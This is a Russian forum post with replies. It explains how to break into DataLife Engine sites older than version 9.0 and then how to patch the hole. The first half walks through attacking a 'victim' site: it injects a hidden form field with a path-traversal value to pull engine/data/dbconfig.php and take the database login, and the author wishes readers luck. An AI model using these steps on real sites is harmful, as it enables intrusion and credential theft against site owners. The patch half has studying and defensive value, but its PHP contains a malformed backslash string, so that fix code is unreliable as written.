Способ взлома и защиты DLE

[A-Jey]

После того как взломали мой сайт, я задался вопросом как его защитить. И понял что зная как его взломать я смогу так его защитить.
И давай искать различные статьи по взлому Dle.
И сейчас я вас ознакомлю как взломать сайт на Dle ну и защитить его от такого рода взлома.

1. Заходим на сайт жертвы

2. Регистрируемся и авторизуемся на сайте

3. Переходим по ссылке http://site.ru/engine/images.php (где site.ru - адрес жертвы)

4. Открываем исходный код открытой нами страницы и после:

<input type="hidden" name="area" value=''>

(строка может немного отличаться и повторяться 2 раза, вставляем после 1й)
вставляем:

<input type="hidden" name="serverfile" value='../../engine/data/dbconfig.php'>

Нажимаем в браузере, под вкладками Применить изменения

5. После этих действий необходимо проверить работоспособность дырки, для этого на странице http://site.ru/engine/images.php, чей исходный код мы редактировали пунктом выше, нажимаем Загрузить. В списке загруженных файлов должен появиться dbconfig.php, мы можем продолжить...

Что бы скачать файл конфига мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:

<a href='http://site.ru/engine/download.php?id=ID_файла'>[download]</a>

и скачиваем файл dbconfig.php с данными для входа в phpMyAdmin, адрес которой обычно site.ru/phpmyadmin/ или site.ru/myadmin/

Только что я рассказал Вам как взломать сайт на DataLife Engine, удачи. (но на более ранних версиях двига может не сработать. Ну или если админ не глуп то это вы не сделаете.)


Сейчас настало время перейти к рассмотрению способа защиты от взлома, описанного выше:

1. Открываем файл engine/inc/files.php и находим:

$serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) );

заменяем на:

if ($member_id['user_group'] == 1) $serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) ); else $serverfile = '';

        if ( $serverfile != '' ) {

            $serverfile = str_replace( "\", "/", $serverfile );
            $serverfile = str_replace( "..", "", $serverfile );
            $serverfile = str_replace( "/", "", $serverfile );
            $serverfile_arr = explode( ".", $serverfile );
            $type = totranslit( end( $serverfile_arr ) );
            $curr_key = key( $serverfile_arr );
            unset( $serverfile_arr[$curr_key] );

            if ( in_array( strtolower( $type ), $allowed_files ) )
                $serverfile = totranslit( implode( ".", $serverfile_arr ) ) . "." . $type;
            else $serverfile = '';

        }

        if( $serverfile == ".htaccess") die("hаcking attempt!");

2. Открываем файл engine/classes/thumb.class.php и находим:

$this->img['des'] = imagecreatetruecolor( $this->img['lebar_thumb'], $this->img['tinggi_thumb'] );

добавляем выше этой строки:
 

if ($this->img['lebar_thumb'] < 1 ) $this->img['lebar_thumb'] = 1;
  if ($this->img['tinggi_thumb'] < 1 ) $this->img['tinggi_thumb'] = 1;

Установка защиты от взлома DLE, а точнее исправление недостаточной фильтрации данных завершена.
Добавлено: 12-05-2013, 22:11:26

Ах да забыл дописать что разработчики в версиях 9.0 и выше пофиксили эту дыру.
Так что у тех у кого версия выше. Просто спасибо за внимание.

[batan-92]

3. Переходим по ссылке http://site.ru/engine/images.php (где site.ru - адрес жертвы)

В системную папку engine через браузер по определению нельзя попасть! 

[xwildx]

Что же тогда хром без каких либо проблем заходит? Проверил на своем сайте. Не канает. Проверил на сайте где уверен был на 100% что он старой версии, никаких сложностей не возникло.

[batan-92]

Что же тогда хром без каких либо проблем заходит? Проверил на своем сайте. Не канает. Проверил на сайте где уверен был на 100% что он старой версии, никаких сложностей не возникло.

Не знаю, лично на моём сайте вот такая проблемка возникает! 
[spoiler][/spoiler]